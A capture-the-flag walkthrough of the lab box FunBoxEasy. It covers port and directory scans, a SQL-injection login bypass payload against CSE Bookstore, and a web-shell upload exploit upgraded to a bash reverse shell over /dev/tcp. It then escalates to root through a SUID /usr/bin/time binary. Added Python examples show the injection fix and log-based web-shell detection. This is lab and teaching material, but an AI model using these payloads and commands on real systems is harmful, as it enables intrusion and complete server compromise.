Proving Grounds >> FunBoxEasy

Table of Contents
  • Target OS: Linux
  • Rated Difficulty: Easy

ENUM >> NMAP

# Nmap 7.92 scan initiated Tue Feb 15 15:16:09 2022 as: nmap -sS -v -sV -sC -oN nmap_initial 192.168.178.111
Nmap scan report for 192.168.178.111
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
|   256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_  256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 15 15:16:30 2022 -- 1 IP address (1 host up) scanned in 21.64 seconds

ENUM >> GoBuster scan

❯ gobuster dir -u http://192.168.178.111 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x php,html,htm,js
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.111
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,htm,js
[+] Timeout:                 10s
===============================================================
2022/02/15 15:17:22 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 318] [--> http://192.168.178.111/admin/]
/dashboard.php        (Status: 302) [Size: 10272] [--> http://192.168.178.111/index.php]
/forgot-password.php  (Status: 200) [Size: 2763]
/header.php           (Status: 200) [Size: 1666]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 3468]
/logout.php           (Status: 200) [Size: 75]
/profile.php          (Status: 302) [Size: 7247] [--> http://192.168.178.111/index.php]
/registration.php     (Status: 200) [Size: 9409]
/robots.txt           (Status: 200) [Size: 14]
/secret               (Status: 301) [Size: 319] [--> http://192.168.178.111/secret/]
/store                (Status: 301) [Size: 318] [--> http://192.168.178.111/store/]

===============================================================
2022/02/15 15:23:16 Finished
===============================================================

PRIVESC >> /store is CSE Bookstore

OK, I’ve done this dance before… In fact, it was part of the OWASP Top 10 room on TryHackMe… so without further ado (and notes from when I did that room on THM):

  • Immediately we are greeted with the name of this web application on the very first page (hence why I knew it would be our PrivEsc method as soon as I loaded this page):

  • Doing a search on searchsploit brings us the 3 below hits… I do like the sound of "Authentication Bypass"!
 ❯ searchsploit "CSE Bookstore"
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                                           | php/webapps/48960.txt
CSE Bookstore 1.0 - Multiple SQL Injection                                                          | php/webapps/49314.txt
---------------------------------------------------------------------------------------------------- --------------------------------
  • The text file was simple yet straight to the point…:
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909

CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel.
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload:
Name: admin
Pass: %' or '1'='1
  • I went with option 1 for password, since it was literally 2 characters…:

  • And just like that, we got admin on the website! But, what next? Not much actually… but all is not lost:

  • Turns out, if we search for Online Book Store on exploit-db we get another exploit that might be worth a shot (and this is where I jumped straight to on this box, as I knew the previous steps were not required):

  • Downloading and running the exploit… we get an RCE $ prompt. Not being a fan of flimsy web shells, I quickly opted for a "bash reverse shell" upgrade:
❯ python3 47887.py http://192.168.178.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php
> Example command usage: http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ bash -c 'bash -i &>/dev/tcp/192.168.49.178/1337 <&1'
  • That’s better! 🙂
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.49.178] from (UNKNOWN) [192.168.178.111] 56036
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox3:/var/www/html/store/bootstrap/img$
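To show why the `%' or '1'='1` payload from the exploit text above gets past the admin login, here is an added example (not code from CSE Bookstore or the exploit author) that rebuilds the flaw against an in-memory SQLite table and puts the parameterised fix beside it. The table, the column names and the LIKE comparison are assumptions; the `%` in the payload hints that the original compares the password with LIKE, but the bypass works with `=` too.

```python
import sqlite3

# Constructed stand-in for the bookstore's admin table (assumed schema, not the real one).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (name TEXT, pass TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'S3cret-Pass!')")
    return db

def login_vulnerable(db, name, password):
    # Hypothetical reconstruction of the flawed pattern: user input is spliced into
    # the SQL text. With the payload the WHERE clause becomes
    #   name='admin' AND pass LIKE '%' OR '1'='1'
    # and the trailing OR makes it true for every row.
    sql = f"SELECT name FROM admin WHERE name='{name}' AND pass LIKE '{password}'"
    return db.execute(sql).fetchone() is not None

def login_fixed(db, name, password):
    # Parameterised query: the payload is bound as a plain string and compared
    # literally, so it can no longer change the shape of the statement.
    sql = "SELECT name FROM admin WHERE name=? AND pass=?"
    return db.execute(sql, (name, password)).fetchone() is not None

def demo():
    db = make_db()
    payload = "%' or '1'='1"
    return {
        "vulnerable_accepts_payload": login_vulnerable(db, "admin", payload),
        "fixed_accepts_payload": login_fixed(db, "admin", payload),
        "fixed_accepts_real_password": login_fixed(db, "admin", "S3cret-Pass!"),
    }

if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Storing the password as a salted hash and comparing in code would be the next fix; this block only isolates the injection itself.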

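The web shell above lands as a random-named .php file under /store/bootstrap/img/ and is driven through a ?cmd= parameter, which is a pattern an Apache access log will show. This added detection example (not part of the original post or the exploit) parses combined-format log lines and flags PHP requests under directories meant for static assets and requests carrying a command-style parameter; the log lines, IPs and directory list are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined format, modelled on the upload-and-command
# pattern seen above (client IPs, timestamps and sizes are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2022:15:30:01 +0000] "GET /store/index.php HTTP/1.1" 200 3468 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Feb/2022:15:30:08 +0000] "GET /store/bootstrap/img/13fLOMSeJW.php HTTP/1.1" 200 12 "-" "python-requests/2.25"
10.0.0.5 - - [15/Feb/2022:15:30:09 +0000] "GET /store/bootstrap/img/13fLOMSeJW.php?cmd=whoami HTTP/1.1" 200 9 "-" "python-requests/2.25"
10.0.0.9 - - [15/Feb/2022:15:31:00 +0000] "GET /store/bootstrap/img/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Directory names that should only ever serve static files (assumed list; tune per site).
STATIC_DIRS = {"img", "images", "uploads", "css", "js", "fonts"}
# Query parameter names commonly used to pass a command to a dropped web shell.
SHELL_PARAMS = {"cmd", "exec", "command"}

def suspicious(line):
    """Return a finding dict for a log line that matches a web-shell pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    segments = parts.path.strip("/").split("/")
    reasons = []
    # A .php file whose parent directories include a static-asset directory.
    if parts.path.lower().endswith(".php") and STATIC_DIRS.intersection(segments[:-1]):
        reasons.append("php-in-static-dir")
    # A command-style parameter in the query string.
    if SHELL_PARAMS.intersection(parse_qs(parts.query)):
        reasons.append("command-parameter")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "target": m["target"],
            "status": int(m["status"]), "reasons": reasons}

def scan(log_text):
    """Run suspicious() over every line and keep the hits."""
    return [hit for hit in map(suspicious, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On a real host, pairing this with a file-integrity check on the web root (new .php files under asset directories) catches the upload even before the first cmd= request.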
PRIVESC >> time is SUID

OK this box was as advertised… a quick look at the SUID binaries and we notice that /usr/bin/time has that special-sauce flag. The time app runs whatever command you give it and reports how long it took, whether the command completes or crashes; because the binary is SUID root, the command it spawns inherits root privileges, so basically it’s an easy step into running whatever we wish as root… in this case /bin/sh -p will give us that # prompt that makes you feel all good inside. 😉

www-data@funbox3:/var/www/html/store/bootstrap/img$ /usr/bin/time /bin/sh -p
#
